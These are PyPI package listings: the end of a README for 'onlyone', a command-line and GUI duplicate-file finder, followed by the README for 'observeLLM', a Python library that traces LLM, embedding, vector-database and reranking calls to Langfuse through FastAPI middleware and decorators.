The main principle: ALL files moved to trash EXCEPT the FIRST file in each group.
Which file is "first" depends on sorting:
* Priority files(files from "Priority Folders", if set) always come first
* Among priorities: file with shortest path (by default) comes first
* Among non-priorities: same rule (shortest path is used by default for in-group sorting)
If both files have the same path depth, the file with shortest filename wins the first place.
REMEMBER: In the end, there can be only one file/per group :)
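The selection rule above might be sketched like this (an illustrative approximation, not the app's exact code; "shortest path" is approximated here by path depth, then filename length):

```python
from pathlib import Path

def keep_key(path, priority_dirs=()):
    """Sort key: priority files first, then shallower paths, then shorter filenames."""
    p = Path(path)
    is_priority = any(str(p).startswith(str(d)) for d in priority_dirs)
    return (not is_priority, len(p.parts), len(p.name))

def pick_survivor(group, priority_dirs=()):
    """Return (kept_file, files_that_would_go_to_trash) for one duplicate group."""
    ordered = sorted(group, key=lambda f: keep_key(f, priority_dirs))
    return ordered[0], ordered[1:]
```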
---
### How to use cli-version
Examples:
Basic usage - find duplicates in Downloads folder:
`onlyone -i ~/Downloads`
Filter files by size and extensions and find duplicates:
`onlyone -i ~/Downloads -m 500KB -M 10MB -x .jpg,.png`
Same as above + move duplicates to trash (with confirmation prompt):
`onlyone -i ~/Downloads -m 500KB -M 10MB -x .jpg,.png --keep-one`
Same as above but without confirmation and with output to a file (for scripts):
`onlyone -i ~/Downloads -m 500KB -M 10MB -x .jpg,.png --keep-one --force > ~/Downloads/report.txt`
Options:
`-i, --input` input folder
`-m, --min-size` min size filter
`-M, --max-size` max size filter
`-x, --extensions` extension filter (space separated)
`-p, --priority-dirs` priority dirs (space separated)
`--excluded-dirs` excluded/ignored dirs (space separated)
`--boost {size,extension,filename}` Rule for initial file grouping:
* `size` Group files of the same size only (default)
* `extension` Group files of the same size and extension
* `filename` Group files of the same size and filename
`**Groups formed above will be checked (hash-checking) in further stages`
`--mode {fast, normal, full}` checking mode (normal by default)
* `fast` checks only the hash sum of the front part of the file
* `normal` checks hash sums of 3 parts of the file
* `full` checks hash sums of 2 parts plus the whole-file hash sum
`--sort {shortest-path, shortest-filename}` sorting inside a group (shortest-path by default)
`--keep-one` Keep one file/per group and move the rest to trash (one confirmation)
`--keep-one --force` Keep one file/per group and move the rest to trash (no confirmation)
`--verbose, -v` Show detailed statistics and progress
`--help, -h` Show help file
### TESTS
`pytest tests/ -v`
### Build with Pyinstaller
`pyinstaller --noconfirm --clean --noconsole --copy-metadata=onlyone --onefile --paths ./src --name=OnlyOne --exclude-module=PySide6.QtNetwork ./src/onlyone/gui/launcher.py`
### Built With
- Python 3.x
- PySide6 (Qt)
- send2trash
- PIL/Pillow (for image handling)
- xxhash
### LINKS
* [GitHub Page](https://github.com/initumX/onlyone)
* [Releases](https://github.com/initumX/onlyone/releases)
* [Changelog](https://github.com/initumX/onlyone/blob/main/CHANGELOG.md)
* [PyPI](https://pypi.org/project/onlyone/)
* email (initum.x@gmail.com)
© 2026 initumX
| text/markdown | null | initumX <initum.x@gmail.com> | null | null | null | null | [
"Development Status :: 4 - Beta",
"Environment :: X11 Applications :: Qt",
"Intended Audience :: End Users/Desktop",
"Operating System :: OS Independent",
"Programming Language :: Python :: 3.9",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Programming Language :: Python :: 3.13",
"Topic :: Utilities"
] | [] | null | null | >=3.9 | [] | [] | [] | [
"xxhash>=3.0.0",
"send2trash>=1.8.0",
"PySide6; extra == \"gui\"",
"Pillow>=9.0.0; extra == \"gui\"",
"pytest>=7.0; extra == \"dev\"",
"pytest-qt>=4.0; extra == \"dev\"",
"pytest-cov>=4.0; extra == \"dev\""
] | [] | [] | [] | [] | twine/6.2.0 CPython/3.13.5 | 2026-02-20T09:24:56.712920 | onlyone-2.4.7.tar.gz | 71,122 | e9/7b/7d16cd57d54bba3c111d2eac2f0e7a9700358dc1a30c499d6bad170da83e/onlyone-2.4.7.tar.gz | source | sdist | null | false | 07c25f0cba1f8431bb73e2bed476b04b | 444fe80f3337d3c58feb8db89ef7780eb7291734210a3c5c68f8b5f9b1d0c90b | e97b7d16cd57d54bba3c111d2eac2f0e7a9700358dc1a30c499d6bad170da83e | MIT | [
"LICENSE"
] | 228 |
2.4 | observeLLM | 1.2.10 | A python package for observing traces of your LLM application. | # ObserveLLM
A powerful observability library for AI/ML applications that provides comprehensive tracing and monitoring capabilities using Langfuse.
## Installation
Install the package from PyPI using:
```bash
pip install observeLLM
```
Note: It is recommended to use the latest version for optimal performance.
## Quick Start
### 1. Initialize Langfuse Client
First, initialize the Langfuse client at your application startup:
```python
from observe_traces import LangfuseInitializer, request_context, trace_api_call
from observe_traces import llm_tracing, llm_streaming_tracing, embedding_tracing, vectordb_tracing, reranking_tracing, general_tracing
from observe_traces import ObservabilityService
# Initialize Langfuse client
LangfuseInitializer.initialize(
langfuse_public_key='your_langfuse_public_key',
langfuse_secret_key='your_langfuse_secret_key',
langfuse_host='your_host_url', # e.g., 'http://localhost:3000'
release='app_version', # e.g., '1.0.0'
environment='your_environment' # e.g., 'development', 'production'
)
# Optional: Close Langfuse client when shutting down
LangfuseInitializer.close()
```
### 2. FastAPI Middleware Setup
Add the unified middleware to your FastAPI application in `main.py` or your entry point:
```python
from fastapi import FastAPI, Request
from observe_traces import unified_middleware, trace_api_call
app = FastAPI()
@app.middleware("http")
async def set_request_context_middleware(request: Request, call_next):
session_id = request.headers.get("X-Request-ID")
# Capture request body for trace input (optional)
body = None
if request.method in ["POST", "PUT", "PATCH"]:
try:
body = await request.json()
except Exception:
# If body can't be parsed as JSON, you can capture it as text or skip
pass
metadata = {
"sessionId": session_id,
"environment": "development",
"serviceName": "observeLLM",
"apiEndpoint": request.url.path,
"user": request.headers.get("X-User-Email"),
**(body or {}),
}
# Optional: Define custom route names
route_mapping = {
"/api/chat": "Chat Generation",
"/api/embeddings": "Text Embedding",
"/api/rerank": "Document Reranking"
}
# Optional: Define tags for categorization and filtering
tag_mapping = {
"/api/chat": ["production", "llm", "chat"],
"/api/embeddings": ["production", "embedding", "search"],
"/api/rerank": ["production", "reranking", "search"],
"/api/health": ["monitoring", "health"]
}
# Optional: Include/exclude routes from tracing
include_routes = ["/api/chat", "/api/embeddings", "/api/rerank"]
exclude_routes = ["/health", "/metrics", "/docs"]
# Prepare input data for trace (can be request body, query params, or custom data)
trace_input = {
"method": request.method,
"path": request.url.path,
"query_params": dict(request.query_params),
"headers": dict(request.headers),
"body": body
}
return await unified_middleware(
request,
call_next,
metadata=metadata,
route_mapping=route_mapping,
tag_mapping=tag_mapping,
include_routes=include_routes,
exclude_routes=exclude_routes,
input=trace_input
)
```
**New Input Capture Feature:**
- `input`: Captures input data for traces (can be any JSON object)
- Useful for tracking request payloads, query parameters, headers, etc.
- Helps with debugging and understanding what data was provided to each trace
- Example: `{"method": "POST", "body": {"query": "Hello"}, "headers": {...}}`
**Enhanced Features:**
- `tag_mapping`: Maps route paths to lists of tags for categorization
- Tags help organize and filter traces in the Langfuse UI
- Useful for grouping traces by environment, service type, or functionality
- Example: `{"/api/chat": ["production", "llm"], "/api/embeddings": ["production", "embedding"]}`
## Usage Methods
ObserveLLM provides two ways to use the tracing decorators:
### Method 1: Direct Decorator Functions
Use the imported decorator functions directly:
```python
from observe_traces import llm_tracing, embedding_tracing, vectordb_tracing, reranking_tracing
@llm_tracing(provider='openai')
async def my_llm_function():
# Your implementation
pass
```
### Method 2: ObservabilityService Class
Create an `ObservabilityService` instance and use its methods:
```python
from observe_traces import ObservabilityService
# Create service instance
observability_service = ObservabilityService()
# Use as decorator methods
@observability_service.llm_tracing(provider='openai')
async def my_llm_function():
# Your implementation
pass
```
Both methods provide identical functionality and can be used interchangeably.
## Variable Mapping
All tracing decorators support an optional `variable_mapping` parameter that allows you to map the expected parameter names to your actual function parameter names. This is useful when your function parameters don't match the decorator's expected names.
**Important**: The mapping direction is `expected_parameter_name: your_parameter_name`
### LLM Tracing Expected Parameters
For both `llm_tracing` and `llm_streaming_tracing` decorators, the following parameters are expected:
- `model_name` (required) - The model name/identifier (fallback: `model`)
- `system_prompt` (optional) - System instructions for the model
- `chat_messages` (required) - The conversation messages/user prompt (fallback: `user_prompt`)
- `operation_name` (optional) - Custom name for the operation (used in trace naming)
- `max_tokens` (optional) - Maximum tokens to generate
- `temperature` (optional) - Sampling temperature
- `tools` (optional) - Available tools/functions for the model
**Additional decorator parameters:**
- `metadata_config` (optional) - List of metadata keys to include in traces. If None, includes all metadata.
- `is_sdk` (optional) - Boolean indicating SDK mode (True) vs standard mode (False, default). Supported for both `llm_tracing` and `llm_streaming_tracing` decorators.
**Note**: The decorator will automatically try fallback parameter names if the primary ones are not found. For example, if `model_name` is not provided, it will look for `model`. If `chat_messages` is not found, it will look for `user_prompt`.
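The resolution order described above (explicit mapping first, then the expected name, then a documented fallback) can be sketched roughly as follows. This is an illustration only; the actual lookup logic is internal to the decorator:

```python
# Fallbacks documented above: model_name -> model, chat_messages -> user_prompt
FALLBACKS = {"model_name": "model", "chat_messages": "user_prompt"}

def resolve_param(expected, kwargs, variable_mapping=None):
    """Illustrative sketch: find the value for an expected parameter name."""
    mapping = variable_mapping or {}
    # 1. Explicit mapping: expected_parameter_name -> your_parameter_name
    if expected in mapping and mapping[expected] in kwargs:
        return kwargs[mapping[expected]]
    # 2. Exact match on the expected name
    if expected in kwargs:
        return kwargs[expected]
    # 3. Documented fallback name (e.g. model_name falls back to model)
    fallback = FALLBACKS.get(expected)
    if fallback and fallback in kwargs:
        return kwargs[fallback]
    return None

kwargs = {"model": "gpt-4o", "user_prompt": [{"role": "user", "content": "hi"}]}
print(resolve_param("model_name", kwargs))  # falls back to "model" -> gpt-4o
print(resolve_param("chat_messages", kwargs,
                    variable_mapping={"chat_messages": "user_prompt"}))
```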
```python
from observe_traces import ObservabilityService
observability_service = ObservabilityService()
@observability_service.llm_tracing(
provider='openai',
variable_mapping={
'model_name': 'model', # Maps decorator's 'model_name' to your 'model' parameter
'chat_messages': 'user_prompt', # Maps decorator's 'chat_messages' to your 'user_prompt' parameter
'system_prompt': 'system_msg', # Maps decorator's 'system_prompt' to your 'system_msg' parameter
'operation_name': 'task_name', # Maps decorator's 'operation_name' to your 'task_name' parameter
'max_tokens': 'max_length', # Maps decorator's 'max_tokens' to your 'max_length' parameter
'temperature': 'temp', # Maps decorator's 'temperature' to your 'temp' parameter
'tools': 'available_tools' # Maps decorator's 'tools' to your 'available_tools' parameter
}
)
async def my_custom_llm_function(model, system_msg, user_prompt, task_name=None, max_length=None, temp=None, available_tools=None, **kwargs):
# Your implementation here
pass
# Example for streaming LLM with metadata filtering
@observability_service.llm_streaming_tracing(
provider='anthropic',
variable_mapping={
'model_name': 'model',
'chat_messages': 'messages',
'system_prompt': 'system',
'operation_name': 'stream_name',
'max_tokens': 'max_output_tokens',
'temperature': 'temp_setting',
'tools': 'function_tools'
},
metadata_config=['model', 'provider', 'timeTaken', 'totalCost'],
is_sdk=False
)
async def my_custom_streaming_function(model, system, messages, stream_name=None, max_output_tokens=None, temp_setting=None, function_tools=None, **kwargs):
# Your streaming implementation here with filtered metadata
pass
```
**Note**: If you don't provide variable mapping, your function parameters must match the expected parameter names exactly. For example:
```python
@observability_service.llm_tracing(provider='openai')
async def standard_llm_function(model_name, system_prompt, chat_messages, operation_name=None, max_tokens=None, temperature=None, tools=None, **kwargs):
# Function parameters match expected names exactly
pass
```
### Other Decorator Mappings
The mapping works for all decorator types:
- **LLM Tracing**: Maps `model_name`, `system_prompt`, `chat_messages`, `operation_name`, `max_tokens`, `temperature`, `tools`
- **Embedding Tracing**: Maps `model_name`, `inputs`, `texts`, etc.
- **Vector DB Tracing**: Maps `namespace`, `query`, `index_host`, `top_k`, etc.
- **Reranking Tracing**: Maps `model_name`, `query`, `documents`, `top_n`, etc.
## Tracing Decorators
ObserveLLM provides six tracing decorators and a `trace_api_call` utility function to enable comprehensive tracing for different AI/ML components:
### 1. LLM Tracing
```python
from observe_traces import llm_tracing
# OR
from observe_traces import ObservabilityService
observability_service = ObservabilityService()
@llm_tracing(provider='openai') # Direct function
# OR
@observability_service.llm_tracing(provider='openai') # Service method
async def llm_api_calling_function(
model_name: str, # Required: e.g., 'gpt-3.5-turbo'
system_prompt: str, # Optional: System instructions
chat_messages: list, # Required: Conversation history
operation_name: str = None, # Optional: Custom operation name for tracing
max_tokens: int = None, # Optional: Maximum tokens to generate
temperature: float = None, # Optional: Sampling temperature
tools: list = None, # Optional: Available tools/functions
**kwargs # Additional parameters
):
# Your LLM API calling logic here
# Returns either:
# 1. Tuple of (response_data, raw_response)
    # 2. Raw response object
    ...
# Example with metadata filtering
@llm_tracing(
provider='openai',
metadata_config=['maxTokens', 'temperature', 'totalCost'] # Only include specific metadata
)
async def cost_focused_llm_function(model_name, chat_messages, **kwargs):
# Only 'maxTokens', 'temperature', and 'totalCost' will be included in trace metadata
pass
# SDK Mode Support (OpenAI and Anthropic)
@llm_tracing(provider='openai', is_sdk=True) # SDK mode for OpenAI
async def openai_sdk_function(model_name, chat_messages, **kwargs):
# Use OpenAI SDK directly - returns complete SDK response object
from openai import AsyncOpenAI
client = AsyncOpenAI()
response = await client.chat.completions.create(
model=model_name,
messages=chat_messages,
tools=kwargs.get('tools', [])
)
return response # Return SDK response object directly
@llm_tracing(provider='anthropic', is_sdk=True) # SDK mode for Anthropic
async def anthropic_sdk_function(model_name, chat_messages, **kwargs):
# Use Anthropic SDK directly - returns complete SDK response object
from anthropic import AsyncAnthropic
client = AsyncAnthropic()
response = await client.messages.create(
model=model_name,
messages=chat_messages,
tools=kwargs.get('tools', [])
)
return response # Return SDK response object directly
@llm_tracing(provider='openai', is_sdk=False) # Standard mode (default)
async def openai_standard_function(model_name, chat_messages, **kwargs):
# Use raw HTTP requests - returns tuple (response_text, raw_json_response)
import httpx
async with httpx.AsyncClient() as client:
response = await client.post(
"https://api.openai.com/v1/chat/completions",
json={"model": model_name, "messages": chat_messages},
headers={"Authorization": f"Bearer {api_key}"}
)
raw_json = response.json()
text = raw_json["choices"][0]["message"]["content"]
return text, raw_json # Return tuple
```
**`is_sdk` Parameter for LLM Tracing:**
The `is_sdk` parameter determines how the decorator processes function returns:
- **`is_sdk=False` (default)**: Standard mode - expects raw HTTP API responses, typically returned as tuple `(response_text, raw_json_response)`
- **`is_sdk=True`**: SDK mode - expects complete SDK response objects (e.g., OpenAI `ChatCompletion` or Anthropic `Message` objects)
**SDK Mode Benefits:**
- Direct extraction of token usage, tool calls, and metadata from SDK objects
- Enhanced tool call support with comprehensive metadata
- Simplified integration with official SDKs
- Automatic handling of complex response structures
Supported LLM Providers:
- OpenAI (GPT-3.5, GPT-4, GPT-4o, etc.) - SDK mode supported
- Anthropic (Claude models) - SDK mode supported
- Groq
- Custom providers can be added using `register_provider()`
### 2. LLM Streaming Tracing
```python
from observe_traces import llm_streaming_tracing
# OR
from observe_traces import ObservabilityService
observability_service = ObservabilityService()
import json
@llm_streaming_tracing(provider='anthropic', is_sdk=False) # Direct function
# OR
@observability_service.llm_streaming_tracing(provider='anthropic', is_sdk=False) # Service method
async def llm_streaming_function(
model_name: str, # Required: e.g., 'claude-3-opus-20240229'
system_prompt: str, # Optional: System instructions
chat_messages: list, # Required: Conversation history
operation_name: str = None, # Optional: Custom operation name for tracing
max_tokens: int = None, # Optional: Maximum tokens to generate
temperature: float = None, # Optional: Sampling temperature
tools: list = None, # Optional: Available tools/functions
**kwargs # Additional parameters
):
# Your streaming LLM API calling logic here
# Should be an async generator that yields specific formatted lines:
# 1. For streaming response chunks:
# yield f"data: {json.dumps({'type': 'data', 'data': chunk_text})}"
# Example:
# yield 'data: {"type": "data", "data": "Hello"}'
# 2. For token usage information:
# yield f"tokens: {json.dumps({'data': {'input': input_tokens, 'output': output_tokens}})}"
# Example:
# yield 'tokens: {"data": {"input": 10, "output": 5}}'
# 3. Any other lines that should be passed through unchanged
# The decorator will:
# - Collect all response chunks to build the complete response
# - Track token usage throughout the stream
# - Calculate costs based on token usage
    # - Create a trace in Langfuse with the complete response and metrics
    ...
# SDK Mode for Complete Response Objects
@llm_streaming_tracing(provider='anthropic', is_sdk=True)
async def llm_sdk_function(
model_name: str,
chat_messages: list,
**kwargs
):
# Your LLM SDK calling logic here that returns a complete response object
# Example SDK response structure:
# {
# "id": "msg_01...",
# "content": [
# {"type": "text", "text": "Response content"},
# {"type": "tool_use", "id": "toolu_01...", "name": "tool_name", "input": {...}}
# ],
# "usage": {"input_tokens": 10, "output_tokens": 20},
# "stop_reason": "end_turn"
# }
return complete_response_object
# Streaming with metadata filtering
@llm_streaming_tracing(
provider='anthropic',
is_sdk=False,
metadata_config=['provider', 'model', 'totalCost', 'hasToolCalls']
)
async def focused_streaming_function(model_name, chat_messages, **kwargs):
# Only specified metadata fields will be included in the trace
async for chunk in streaming_api_call():
yield chunk
```
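To make the `data:`/`tokens:` line protocol concrete, here is a minimal consumer that aggregates response chunks and token usage the way the decorator is described to do. This is a simplified sketch; the real decorator also computes costs and creates the Langfuse trace:

```python
import asyncio
import json

async def toy_stream():
    # Hypothetical generator yielding the line format described above
    yield 'data: {"type": "data", "data": "Hello"}'
    yield 'data: {"type": "data", "data": " world"}'
    yield 'tokens: {"data": {"input": 10, "output": 5}}'

async def collect(stream):
    """Aggregate text chunks and token usage from the yielded lines."""
    text, usage = [], {}
    async for line in stream:
        if line.startswith("data: "):
            payload = json.loads(line[len("data: "):])
            if payload.get("type") == "data":
                text.append(payload["data"])
        elif line.startswith("tokens: "):
            usage = json.loads(line[len("tokens: "):])["data"]
    return "".join(text), usage

response, tokens = asyncio.run(collect(toy_stream()))
print(response)  # Hello world
print(tokens)    # {'input': 10, 'output': 5}
```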
**`is_sdk` Parameter:**
The `is_sdk` parameter determines how the decorator handles the function's return value:
- **`is_sdk=False` (default)**: Streaming mode - expects an async generator that yields formatted chunks
- **`is_sdk=True`**: SDK mode - expects an async generator that yields streaming data and special final message events
**Streaming Mode (`is_sdk=False`):**
- Function must be an async generator yielding chunks
- Processes streaming events in real-time
- Collects chunks to build complete response
- Parses token usage from streaming events
**SDK Mode (`is_sdk=True`):**
- Function must be an async generator that yields streaming data in real-time
- Yields streaming text chunks during the LLM response
- Yields a special `anthropic_final_message` event at the end with complete response data
- The decorator automatically detects this special event and extracts trace data from it
- Combines real-time streaming with comprehensive tracing
### SDK Mode Implementation Example
```python
import json
from anthropic import AsyncAnthropic
@llm_streaming_tracing(provider='anthropic', is_sdk=True)
async def sdk_streaming_function(model_name, chat_messages, system_prompt=None, **kwargs):
"""
SDK Mode function that yields streaming data and final message for tracing.
This function:
1. Streams text chunks in real-time using the Anthropic SDK
2. Yields a special anthropic_final_message event with complete response data
3. The decorator automatically processes this event for comprehensive tracing
"""
client = AsyncAnthropic(api_key="your-api-key")
try:
# Stream the response using Anthropic SDK
async with client.messages.stream(
model=model_name,
max_tokens=kwargs.get('max_tokens', 1024),
system=system_prompt,
messages=chat_messages,
temperature=kwargs.get('temperature', 0.7),
tools=kwargs.get('tools', []) # Include tools if provided
) as stream:
# Yield streaming text chunks in real-time
async for text in stream.text_stream:
yield f"data: {json.dumps({'type': 'text_chunk', 'text': text})}\n\n"
# Get the final message with complete response data
final_message = await stream.get_final_message()
# Convert to dict for the special event
final_message_dict = final_message.model_dump()
# Yield the special anthropic_final_message event
# The decorator will detect this and extract tracing data
yield f"data: {json.dumps({'type': 'anthropic_final_message', 'data': final_message_dict})}\n\n"
# Optional: yield completion event
yield f"data: {json.dumps({'type': 'stream_complete', 'message': 'SDK streaming completed'})}\n\n"
except Exception as e:
yield f"data: {json.dumps({'type': 'error', 'error': str(e)})}\n\n"
# Usage in FastAPI endpoint
@app.post("/stream/sdk-mode")
async def stream_with_sdk_mode(request: StreamingRequest):
async def generate():
async for chunk in sdk_streaming_function(
model_name=request.model,
system_prompt=request.system_prompt,
chat_messages=[{"role": msg.role, "content": msg.content} for msg in request.messages],
max_tokens=request.max_tokens,
temperature=0.7,
tools=[{"name": "weather", "description": "Get weather info"}] # Optional tools
):
yield chunk
return StreamingResponse(
generate(),
media_type="text/plain",
headers={"Cache-Control": "no-cache", "Connection": "keep-alive"}
)
```
**Key Benefits of SDK Mode (`is_sdk=True`):**
- **Real-time streaming**: Users see text appearing as it's generated
- **Comprehensive tracing**: Complete response data, token usage, costs, and tool calls are captured
- **Tool call support**: Handles complex responses with tool calls and multiple content blocks
- **Error handling**: Proper error propagation while maintaining streaming capability
- **Automatic processing**: The decorator handles trace creation from the final message event
## Metadata Configuration
All tracing decorators support an optional `metadata_config` parameter that allows you to control which metadata fields are included in your traces. This feature provides fine-grained control over trace payloads and helps focus on specific metrics.
### Usage
```python
# Include only specific metadata fields
@llm_tracing(provider='openai', metadata_config=['maxTokens', 'temperature', 'totalCost'])
async def focused_llm_function(model_name, chat_messages, **kwargs):
pass
# Include all metadata (default behavior)
@llm_tracing(provider='openai') # metadata_config=None
async def full_metadata_function(model_name, chat_messages, **kwargs):
pass
# Include no metadata
@llm_tracing(provider='openai', metadata_config=[])
async def minimal_metadata_function(model_name, chat_messages, **kwargs):
pass
```
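The three cases above (a list of keys, `None`, and `[]`) amount to a simple key filter. A rough sketch of the semantics, for illustration only:

```python
def filter_metadata(metadata, metadata_config=None):
    """Sketch of the described semantics: None keeps everything,
    [] keeps nothing, a list keeps only the listed keys."""
    if metadata_config is None:
        return dict(metadata)
    return {k: v for k, v in metadata.items() if k in metadata_config}

meta = {"model": "gpt-4o", "temperature": 0.2, "totalCost": 0.0013}
print(filter_metadata(meta, ["totalCost"]))  # {'totalCost': 0.0013}
print(filter_metadata(meta, []))             # {}
print(filter_metadata(meta))                 # all three keys
```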
### Available Metadata Fields
**LLM Tracing (`llm_tracing` and `llm_streaming_tracing`):**
- `model` - Model name/identifier
- `provider` - LLM provider name
- `maxTokens` - Maximum tokens to generate
- `temperature` - Sampling temperature
- `tool` - Available tools/functions
- `timeTaken` - Response time in seconds
- `inputTokens` - Number of input tokens
- `outputTokens` - Number of output tokens
- `inputCost` - Cost for input tokens
- `outputCost` - Cost for output tokens
- `totalCost` - Total cost for the request
- `hasToolCalls` - Whether tool calls were made
- `toolCallCount` - Number of tool calls
- `sdkMode` - Whether SDK mode was used (streaming only)
- `currentStreamHasToolCalls` - Tool calls in current stream (streaming only)
- `currentStreamToolCallCount` - Tool call count in current stream (streaming only)
- `originalResponse` - Full raw response from the LLM; include it selectively, as it can substantially increase trace size
...and more.
**Embedding Tracing (`embedding_tracing`):**
- `provider` - Embedding provider name
- `model_name` - Model name/identifier
- `input count` - Number of input texts
- `cost` - Total cost for embeddings
- `token usage` - Number of tokens used
- `price` - Detailed pricing information
- `embedding_dimensions` - Dimensionality of embeddings
- `timestamp` - Timestamp of the operation
**Vector DB Tracing (`vectordb_tracing`):**
- `operation_type` - Type of operation (read/write)
- `provider` - Vector DB provider name
- `cost` - Operation cost
- `read_units` - Number of read units consumed
- `index_host` - Vector database host
- `namespace` - Vector database namespace
- `top_k` - Number of results requested (read operations)
- `upserted_vectors` - Number of vectors upserted (write operations)
**Reranking Tracing (`reranking_tracing`):**
- `provider` - Reranking provider name
- `model_name` - Model name/identifier
- `output_count` - Number of documents processed
- `cost` - Total cost for reranking
- `token usage` - Number of tokens used
- `timestamp` - Timestamp of the operation
- `top_n` - Number of top results requested
### Common Use Cases
```python
# Cost tracking focus
@llm_tracing(
provider='openai',
metadata_config=['inputCost', 'outputCost', 'totalCost', 'inputTokens', 'outputTokens']
)
async def cost_monitoring_function(model_name, chat_messages, **kwargs):
pass
# Performance tracking focus
@llm_tracing(
provider='anthropic',
metadata_config=['timeTaken', 'inputTokens', 'outputTokens', 'model']
)
async def performance_monitoring_function(model_name, chat_messages, **kwargs):
pass
# Tool usage tracking
@llm_streaming_tracing(
provider='anthropic',
metadata_config=['hasToolCalls', 'toolCallCount', 'currentStreamHasToolCalls', 'tool']
)
async def tool_monitoring_function(model_name, chat_messages, tools, **kwargs):
pass
# Minimal metadata for compliance
@embedding_tracing(
provider='openai',
metadata_config=['provider', 'model_name']
)
async def compliance_focused_embedding(model_name, inputs, **kwargs):
pass
```
### Benefits
- **Reduced payload size**: Include only necessary metadata to minimize trace size
- **Focused monitoring**: Track specific metrics relevant to your use case
- **Performance optimization**: Smaller payloads improve query and dashboard performance
- **Compliance support**: Exclude sensitive metadata fields when required
- **Cost optimization**: Reduce storage and bandwidth costs for traces
### 3. Embedding Tracing
```python
from observe_traces import embedding_tracing
# OR
from observe_traces import ObservabilityService
observability_service = ObservabilityService()
@embedding_tracing(provider='openai') # Direct function
# OR
@observability_service.embedding_tracing(provider='openai') # Service method
async def embedding_generation_function(
model_name: str, # e.g., 'text-embedding-ada-002'
inputs: list, # List of texts to embed
**kwargs # Additional parameters
):
# Your embedding API calling logic here
# Returns either:
# 1. Tuple of (embeddings, raw_response)
    # 2. Raw response object
    ...
```
Supported Embedding Providers:
- OpenAI
- Pinecone
- Cohere
- Jina
- VoyageAI
- Custom providers can be added using `register_embedding_provider()`
### 4. Vector Database Tracing
```python
from observe_traces import vectordb_tracing
# OR
from observe_traces import ObservabilityService
observability_service = ObservabilityService()
# For write operations
@vectordb_tracing(provider='pinecone', operation_type='write') # Direct function
# OR
@observability_service.vectordb_tracing(provider='pinecone', operation_type='write') # Service method
async def vectordb_write_function(
index_host: str,
vectors: list,
namespace: str
):
# Your vector DB write logic here
    # Returns raw response object
    ...
# For read operations
@vectordb_tracing(provider='pinecone', operation_type='read') # Direct function
# OR
@observability_service.vectordb_tracing(provider='pinecone', operation_type='read') # Service method
async def vectordb_read_function(
index_host: str,
namespace: str,
top_k: int,
query: str,
query_vector_embeds: list,
query_sparse_embeds: dict = None,
include_metadata: bool = True,
filter_dict: dict = None
):
# Your vector DB read logic here
    # Returns raw response object
    ...
```
Supported Vector DB Providers:
- Pinecone
- Custom providers can be added by extending the provider configurations
### 5. API Call Tracing
```python
from observe_traces import trace_api_call
from fastapi import Request
@app.get("/some-endpoint")
async def example_endpoint(request: Request):
# Your API logic here
input_data = {"param1": "value1", "param2": "value2"}
# Perform some operation
result = some_function(input_data)
# Log the API call within the request trace
span_id = trace_api_call(
request=request,
name="Example API Call",
input_data=input_data,
output_data=result,
metadata={"additional_info": "some value"}
)
return result
```
This function allows you to create spans within existing traces to track API calls with:
- Complete input/output data
- Custom metadata
- Integration with the request tracing system
### 6. Reranking Tracing
```python
from observe_traces import reranking_tracing
# OR
from observe_traces import ObservabilityService
observability_service = ObservabilityService()
@reranking_tracing(provider='cohere') # Direct function
# OR
@observability_service.reranking_tracing(provider='cohere') # Service method
async def reranking_function(
model_name: str,
query: str,
documents: list,
top_n: int,
**kwargs
):
# Your reranking API calling logic here
# Returns either:
# 1. Tuple of (rerank_results, raw_response)
    # 2. Raw response object
    ...
```
Supported Reranking Providers:
- Cohere
- Pinecone
- Jina
- VoyageAI
- Custom providers can be added using `register_reranking_provider()`
### 7. General Tracing
```python
from observe_traces import general_tracing
# OR
from observe_traces import ObservabilityService
observability_service = ObservabilityService()
@general_tracing() # Direct function
# OR
@observability_service.general_tracing() # Service method
async def any_function(
param1: Any, # Any function parameters
param2: Any, # The decorator is completely agnostic
**kwargs # Additional parameters
):
# Your function logic here
    # Returns any value or None
    ...
```
The `general_tracing` decorator is a **powerful, agnostic tracing solution** that can trace any Python function regardless of its purpose. It automatically captures:
- Function arguments as input
- Return values as output (or captured results for functions without return values)
- Execution timing and metadata
- **Parent-child relationships for nested function calls**
- Error handling and exception information
**Key Features:**
#### **Case 1: Normal Functions with Return Values**
```python
from observe_traces import general_tracing
@general_tracing()
async def process_data(data: dict, operation: str) -> dict:
"""Function that returns a result."""
processed = {"operation": operation, "result": data["value"] * 2}
return processed
# Usage in an endpoint
@app.post("/process")
async def process_endpoint(request: ProcessRequest):
result = await process_data(request.data, "multiply")
return {"success": True, "result": result}
```
#### **Case 2: Functions Without Return Values (using capture_result)**
```python
from observe_traces import general_tracing, capture_result
@general_tracing()
async def log_operation(user_id: str, action: str) -> None:
"""Function that doesn't return anything but captures results."""
log_entry = {
"user_id": user_id,
"action": action,
"timestamp": datetime.now().isoformat(),
"status": "completed"
}
# Store in database (no return value)
database.insert_log(log_entry)
# Capture the result for tracing
capture_result(log_entry)
# Usage in an endpoint
@app.post("/log")
async def log_endpoint(request: LogRequest):
await log_operation(request.user_id, request.action)
return {"success": True, "message": "Action logged"}
```
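Conceptually, `capture_result` stashes a value in request context so the decorator can pick it up after the call returns. A toy sketch of that mechanism (the library's internals may differ):

```python
import asyncio
import contextvars
import functools

_captured = contextvars.ContextVar("captured_result", default=None)
trace_outputs = []  # stand-in for span outputs sent to Langfuse

def capture_result(value):
    """Stash a value for the active trace (simplified stand-in)."""
    _captured.set(value)

def traced(func):
    """Toy decorator: trace the return value, or the captured result if None."""
    @functools.wraps(func)
    async def wrapper(*args, **kwargs):
        token = _captured.set(None)
        try:
            result = await func(*args, **kwargs)
            trace_outputs.append(result if result is not None else _captured.get())
            return result
        finally:
            _captured.reset(token)
    return wrapper

@traced
async def log_action(user_id):
    # No return value; the captured dict becomes the trace output instead
    capture_result({"user_id": user_id, "status": "completed"})

asyncio.run(log_action("u1"))
print(trace_outputs[0])  # {'user_id': 'u1', 'status': 'completed'}
```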
#### **Case 3: Custom Span Names**
```python
@general_tracing(name="Data Processing Pipeline")
async def complex_data_processing(input_data: list) -> dict:
"""Function with custom span name instead of function name."""
# Your processing logic
return {"processed_count": len(input_data)}
```
#### **Case 4: Metadata Filtering**
```python
@general_tracing(metadata_config=["functionName", "timeTaken", "hasReturn", "argumentCount"])
async def optimized_function(large_data: dict) -> dict:
"""Function with filtered metadata to reduce trace payload size."""
# Only specified metadata fields will be included in the trace
return {"status": "processed"}
```
**Available Metadata Fields:**
- `functionName` - Name of the traced function
